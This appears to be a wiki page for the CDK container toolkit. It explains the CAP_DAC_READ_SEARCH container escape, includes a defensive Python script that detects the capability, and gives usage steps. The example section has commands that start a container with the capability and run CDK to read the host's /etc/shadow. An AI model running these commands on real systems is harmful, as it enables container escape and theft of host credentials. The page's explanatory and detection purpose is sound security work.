
Exploit: cap dac read search

neargle edited this page May 6, 2021 · 4 revisions

Exploit: cap-dac-read-search

Thanks @nikitastupin.

If a container is run with the CAP_DAC_READ_SEARCH capability, it is able to read arbitrary files from the host system. This is possible because CAP_DAC_READ_SEARCH grants the ability to bypass DAC (discretionary access control) checks and to open files by file handle, and file handles are global file identifiers that are valid outside the container's mount namespace. The original exploit can be found at http://stealth.openwall.net/xSports/shocker.c.
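The quickest way to tell whether a running container is exposed to this is to look at its capability sets rather than to try the exploit. The following is an added example for this wiki page, not code from CDK: it parses the `CapEff`/`CapPrm`/`CapBnd` hex bitmasks that the kernel reports in `/proc/<pid>/status` (the same values `capsh --decode` reads) and checks bit 2, which is `CAP_DAC_READ_SEARCH` in `linux/capability.h`. The two status snippets are constructed samples: the first uses Docker's default capability mask (`00000000a80425fb`), the second the same mask with bit 2 set, as `--cap-add CAP_DAC_READ_SEARCH` would produce.

```python
"""Check whether a process (for example a shell inside a container) holds
CAP_DAC_READ_SEARCH by decoding the Cap* lines of /proc/<pid>/status.

Added example for this wiki page; it is not part of CDK.
"""
from __future__ import annotations

# Subset of capability numbers from <linux/capability.h>.
CAP_NUMBERS = {
    "CAP_CHOWN": 0,
    "CAP_DAC_OVERRIDE": 1,
    "CAP_DAC_READ_SEARCH": 2,
    "CAP_FOWNER": 3,
    "CAP_SYS_MODULE": 16,
    "CAP_SYS_CHROOT": 18,
    "CAP_SYS_PTRACE": 19,
    "CAP_SYS_ADMIN": 21,
}

CAP_SETS = ("CapEff", "CapPrm", "CapBnd")


def parse_cap_masks(status_text: str) -> dict[str, int]:
    """Return every Cap* line of /proc/<pid>/status as name -> integer bitmask."""
    masks: dict[str, int] = {}
    for line in status_text.splitlines():
        if line.startswith("Cap") and ":" in line:
            name, _, value = line.partition(":")
            masks[name.strip()] = int(value.strip(), 16)
    return masks


def has_capability(mask: int, cap_name: str) -> bool:
    """True if the capability's bit is set in the given mask."""
    return bool((mask >> CAP_NUMBERS[cap_name]) & 1)


def check_dac_read_search(status_text: str) -> dict[str, bool]:
    """Report CAP_DAC_READ_SEARCH membership per capability set.

    CapEff is what the exploit on this page needs right now; CapPrm and
    CapBnd tell whether a process could still (re)acquire it, so an auditor
    wants all three to be False for an untrusted container.
    """
    masks = parse_cap_masks(status_text)
    return {s: has_capability(masks.get(s, 0), "CAP_DAC_READ_SEARCH") for s in CAP_SETS}


def check_self() -> dict[str, bool]:
    """Run the check against the current process (Linux only)."""
    with open("/proc/self/status", encoding="utf-8") as fh:
        return check_dac_read_search(fh.read())


# Constructed sample: a shell in a container started with Docker's default
# capability set. 0xa80425fb is the mask Docker grants by default; bit 2 is clear.
DEFAULT_DOCKER_STATUS = """\
Name:\tbash
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fb
CapEff:\t00000000a80425fb
CapBnd:\t00000000a80425fb
CapAmb:\t0000000000000000
"""

# Constructed sample: the same container started with --cap-add CAP_DAC_READ_SEARCH,
# which sets bit 2 (0xa80425fb | 0x4 == 0xa80425ff).
CAP_ADDED_STATUS = DEFAULT_DOCKER_STATUS.replace("a80425fb", "a80425ff")


if __name__ == "__main__":
    print("default docker container:", check_dac_read_search(DEFAULT_DOCKER_STATUS))
    print("with --cap-add CAP_DAC_READ_SEARCH:", check_dac_read_search(CAP_ADDED_STATUS))
    try:
        print("this process:", check_self())
    except FileNotFoundError:
        print("this process: /proc/self/status not available (not Linux)")
```

Run it inside the container from the example below and `CapEff` will read `True`; in a container started without `--cap-add` it reads `False` for all three sets, which is the state to aim for: the fix is simply not to grant the capability (and, for workloads that need only part of it, to keep it out of the bounding set with `--cap-drop`).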

Usage

cdk run cap-dac-read-search <target> <ref>
# Read the target file from the host. The first argument is the target file on the host; the second is a file bind-mounted into the container from the host.

Example

  1. Build cdk
  2. Run a docker container: docker run -it --rm --cap-add CAP_DAC_READ_SEARCH -v "$(pwd)/cdk":/cdk ubuntu /bin/bash
  3. Run the cdk exploit inside the container: cdk run cap-dac-read-search /etc/shadow /etc/hosts

You should get /etc/shadow from host:

(screenshot: host-shadow)

Verify that /etc/shadow from container is different:

(screenshot: container-shadow)
